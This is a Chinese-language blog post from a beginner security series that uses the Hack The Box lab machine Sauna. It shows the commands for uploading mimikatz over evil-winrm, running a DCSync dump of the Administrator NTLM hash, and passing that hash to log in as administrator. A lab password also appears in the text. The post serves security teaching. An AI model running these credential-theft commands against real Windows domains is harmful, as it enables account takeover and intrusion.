iT邦幫忙

2023 iThome 鐵人賽

DAY 22
0
Security

入門級資安實戰:以Hack The Box為輔學習網路漏洞掃描與利用系列 第 22

[Day 22] Windows密碼提取- Mimikatz (Windows password extraction - Mimikatz )

  • 分享至 

  • xImage
  •  

前言

今天要介紹的工具是mimikatz,它是由一個名叫Benjamin DELPY的法國人開發的,主要從lsass內存中獲得windows裡的明文密碼、雜湊值或是kerberos門票(tickets)。

正文

這個範例我使用靶機Sauna說明,目前已經取得使用者svc_loanmgr的存取權,能夠登入目標靶機,但是需要提權才能夠拿到root.txt,接著使用mimikatz獲得NTLM的雜湊值。

在kali裡,已經有mimikatz不需要到github上下載,將目錄切換至mimikatz的檔案夾下,然後登入使用者svc_loanmgr。

cd /usr/share/windows-resource/mimikatz/Win32
evil-winrm -i 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'

因為目前我們已經在mimikatz的目錄底下,所以只需要下指令上傳mimikatz.exe。

upload mimikatz.exe
./mimikatz.exe "lsadump:dcsync /user:Administrator" "exit"

upload指令後面輸入mimikatz.exe的位置,如果不是在當前目錄下要修改路徑。接著,執行mimikatz.exe 擷取NTLM 的hash值。
lsadump代表向LSA伺服器從記憶體抓取雜湊值,並且利用dcsync的方式,假裝一個網域控制請求資料,藉此獲得hash。

最後,我們拿到了NTLM的雜湊值,我們就能夠利用evil-winrm以administrator的身份登入。

evil-winrm -i 10.10.10.175 -u administrator -H [hash NTLM]

[hash value]就是輸入從mimikatz所得到的NTLM hash值。

今天的介紹到此結束,謝謝:)
/images/emoticon/emoticon41.gif

補充


上一篇
[Day 21]隧道-Chisel (Tunneling-Chisel)
下一篇
[Day 23]Windows提權 - Juicy Potato (Windows privilege escalation-Juicy Potato )
系列文
入門級資安實戰:以Hack The Box為輔學習網路漏洞掃描與利用25
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言